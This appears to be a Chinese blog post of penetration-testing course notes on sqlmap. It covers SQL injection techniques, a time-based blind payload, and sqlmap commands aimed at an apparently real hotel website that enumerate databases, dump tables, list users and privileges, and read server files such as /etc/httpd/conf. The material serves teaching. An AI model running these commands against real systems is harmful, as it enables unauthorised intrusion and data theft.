sqlmap应用 第三十三天 周五
sqlmap的五种漏洞检测技术
基于布尔的盲注检测
基于时间的盲注检测
' and sleep(0) --+
基于报错的检测(报错型注入)
基于union联合查询的检测
通过循环输出查询结果,否则只显示第一项结果
基于堆叠查询
多语句查询
适用于非select的数据修改,删除的操作
支持的数据库管理系统DBMS:
★一阶注射
★二阶注射
一阶注射是指输入的注射语句对WEB直接产生了影响,出现了结果;二阶注入类似存储型XSS,是指输入提交的语句,无法直接对WEB应用程序产生影响,通过其它的辅助间接的对WEB产生危害,这样的就被称为是二阶注入.
基于注入点的位置上的
▲通过用户输入的表单域的注射。
▲通过cookie注射。
▲通过服务器变量注射。 (基于头部信息的注射)
常用的系统函数
1. version()——MySQL版本
2. user()——数据库用户名
3. database()——数据库名
4. @@datadir——数据库路径
5. @@version_compile_os——操作系统版本
sqlmap参数
-p 指定注入点参数
应用实例:
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id
-v 显示请求头
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -v 5
不管注入是否成功,都会显示出请求头来
通过注入点查看当前数据库
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id --dbs
查看数据库下的表
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -D security --tables
查看数据库及表下的列
sqlmap -u "http://www.sansihotels.com/hotels.php?id=1" -p id -D security -T emails --columns
指定字段,通过dump脱库,
sqlmap的另类应用
get数据包的应用
相关语法:
sqlmap -r Decktop/a.txt 自动识别参数,
post数据包的应用
修改参数位置,可以用burpsuite抓包发送reperter复制粘贴
sqlmap -r Decktop/a.txt 其数据库,表,列的查询与上面的一致
cookie值的应用
查看系统命令
--users 查看系统用户
--privileges 查看管理员权限
--batch 静默选择项
根据系统命令读取系统配置文件信息
通过注入点应用:--file-read 函数读取以下信息
"/etc/httpd/conf"
"/var/www/html/index.php"
注意点:
1、apache在linux用yum源装载,在默认的目录下
2、apache在
windows
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 zhumeng512@qq.com
文章标题:sqlmap应用 第三十三天 周五
本文作者:弈少
发布时间:2019-08-31, 19:35:53
最后更新:2019-09-01, 00:12:45
原始链接:http://yoursite.com/2019/08/31/北京渗透测试第三十三天 20190830/版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。